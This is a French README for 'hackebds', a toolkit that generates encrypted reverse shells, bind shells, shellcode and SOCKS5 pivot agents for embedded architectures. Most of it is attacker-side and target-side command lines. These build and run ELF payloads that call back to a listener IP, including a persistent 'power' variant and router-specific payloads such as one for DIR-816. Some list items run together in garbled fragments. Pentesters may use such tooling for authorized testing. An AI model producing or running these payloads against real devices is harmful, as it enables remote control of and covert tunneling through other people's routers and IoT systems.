
Cet outil est utilisé pour le chiffrement de backdoor, la génération de shellcode et de proxy socks5, la récupération d'informations et l'organisation de POC pour divers dispositifs architecturaux.
hackebds est une boîte à outils pour la génération de payloads pour dispositifs embarqués, les workflows de shell chiffré, le tunneling proxy SOCKS5 et la recherche d'informations sur les dispositifs.
La branche actuelle utilise un workflow ELF pur pour les fonctionnalités de shell chiffré et de proxy :
reverse_shell_file + encrypted_shell_server / reverse_shell_serverbind_shell + bind_shell_clientreverse_proxy_file + reverse_proxy_serverforward_proxy_fileencrypted_shell_server / reverse_shell_server pour recevoir les reverse shells chiffrés sans avoir besoin d'un interpréteur Pythonbind_shell_client pour bind_shellaes et chacha20 pour le trafic shell / proxy chiffré-bind_ip pour les binaires ELF côté listener tels que bind_shell, encrypted_shell_server, reverse_proxy_server et forward_proxy_filereverse_shell_file et comme sortants : ils utilisent et ne lient pas d'adresse IP de localepython3 -m pip install -U hackebds
Installation en mode développement local :
git clone https://github.com/doudoudedi/hackEmbedded
cd hackEmbedded
python3 -m pip install -e .
Si vous reconstruisez les wheels de version sur un autre hôte, utilisez l'archive source et build_release.py.
unzip hackebds-0.4.3-source-for-x86-build.zip
cd hackebds-0.4.0.backup-20260411T142751Z
python3 -m pip install -U pip setuptools wheel cython
python3 build_release.py --plat manylinux2014_x86_64
Installez les binutils pour l'architecture cible avant de générer des fichiers ELF non natifs.
sudo apt install binutils-aarch64-linux-gnu
sudo apt install binutils-arm-linux-gnueabi
sudo apt install binutils-mips-linux-gnu
sudo apt install binutils-mipsel-linux-gnu
sudo apt install binutils-mips64-linux-gnuabi64
sudo apt install binutils-mips64el-linux-gnuabi64
sudo apt install binutils-powerpc-linux-gnu
sudo apt install binutils-riscv64-linux-gnu
Les utilisateurs macOS peuvent utiliser les binutils de pwntools :
brew install https://raw.githubusercontent.com/Gallopsled/pwntools-binutils/master/osx/binutils-$ARCH.rb
Côté attaquant :
hackebds -arch x64 -res encrypted_shell_server \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_server.elf
chmod +x reverse_server.elf
./reverse_server.elf
Cible :
hackebds -arch mipsel -res reverse_shell_file \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_payload.elf
chmod +x reverse_payload.elf
./reverse_payload.elf
Remarques :
reverse_shell_file ne supporte pas -bind_ipencrypted_shell_server supporte -bind_ip-cipher chacha20 par -cipher aes pour utiliser AESCible :
hackebds -arch aarch64 -res bind_shell \
-bind_port 5555 \
-bind_ip 192.168.56.20 \
-passwd "s3cr3t" \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_shell.elf
chmod +x bind_shell.elf
./bind_shell.elf
Côté attaquant :
hackebds -arch x64 -res bind_shell_client \
-reverse_ip 192.168.56.20 -reverse_port 5555 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename bind_client.elf
chmod +x bind_client.elf
./bind_client.elf
Ensuite, saisissez :
s3cr3t
id
uname -a
exit
Listener :
hackebds -arch x64 -res encrypted_shell_server --power \
-reverse_port 4444 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_server.elf
./power_server.elf
Payload :
hackebds -arch armelv7 -res reverse_shell_file --power -sleep 10 \
-reverse_ip 192.168.56.1 -reverse_port 4444 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename power_payload.elf
Serveur :
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_server.elf
chmod +x reverse_proxy_server.elf
./reverse_proxy_server.elf
Agent :
hackebds -arch mips64el -res reverse_proxy_file \
-reverse_ip 192.168.56.1 -reverse_port 7000 \
-cipher chacha20 -encrypt_key "demo-key" \
-filename reverse_proxy_agent.elf
chmod +x reverse_proxy_agent.elf
./reverse_proxy_agent.elf
Test :
curl --socks5-hostname 127.0.0.1:1080 http://example.com/
Serveur avec authentification :
hackebds -arch x64 -res reverse_proxy_server \
-agent_port 7000 -socks_port 1080 \
-bind_ip 192.168.56.1 \
-socks_auth user:pass \
-cipher aes -encrypt_key "demo-key" \
-filename reverse_proxy_server_auth.elf
Note UDP :
sparc / sparc64 ne doivent pas être considérés comme supportant UDPhackebds -arch x64 -res forward_proxy_file \
-listen_port 1081 \
-bind_ip 192.168.56.1 \
-filename forward_proxy.elf
chmod +x forward_proxy.elf
./forward_proxy.elf
Test :
curl --socks5-hostname 127.0.0.1:1081 http://example.com/
hackebds -arch armelv7 -res reverse_shellcode \
-reverse_ip 192.168.56.1 -reverse_port 4444
-modelhackebds -reverse_ip 127.0.0.1 -reverse_port 9999 \
-model DIR-816 -res reverse_shell_file
--mcpuhackebds -mcpu mips32r2 -li -arch mipsel \
-reverse_ip 127.0.0.1 -reverse_port 9999 \
-res reverse_shell_file
--firmwarehackebds --firmware ./firmware.bin
-bind_ip est réservé aux fichiers ELF côté listenerreverse_shell_file et reverse_proxy_file sont des payloads sortants et ne lient pas d'adresse IP de listener localereverse_proxy_server et forward_proxy_file supportent -bind_ipchacha20 et aes, à condition que les deux côtés soient d'accordreverse_proxy_file-reverse_ip